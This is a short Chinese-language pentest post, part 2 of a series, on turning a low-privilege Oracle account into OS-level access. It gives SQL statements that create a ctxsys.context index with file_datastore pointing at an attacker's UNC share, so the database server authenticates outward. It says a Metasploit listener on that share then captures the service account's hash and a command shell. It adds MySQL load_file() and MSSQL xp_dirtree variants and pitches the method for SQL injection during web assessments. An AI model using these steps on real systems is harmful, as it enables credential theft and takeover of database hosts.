Oracle 低权限数据库账户得到 OS 访问权限 提权利用（2）

4.然后执行下面 3 条 SQL 语句

SQL> CREATE TABLE files(id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,ot_format VARCHAR(6));SQL> INSERT INTO files VALUES(1,'\\192.168.1.52\mickey',NULL);SQL>  CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context2  PARAMETERS('datastore ctxsys.file_datastore format column ot_format');

后来经过 pt007 的提醒，我又测试了 mysql,如果服务也是 administrator 启动的，用select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系统权限的.MSSQL 应该用 xp_dirtree 存储过程 也是可以的，不过我没有配置出来用 administrator 账户启动 MSSQL 服务，希望知道的朋友指点下我。

这个技术可以用到内网 WEB 评估的时候，如果有注入，服务又是 administrator 启动的，可以提权了。

两个PDF下载,

作者:Mickey
http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(Oracle％20database).pdf
http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf

当执行完 create index 这句的时候，在看咱们本地的 metasploit，就已经得到 ORACLE 数据库主机的系 统当前服务用户的 half lm 哈希和 cmdshell 了。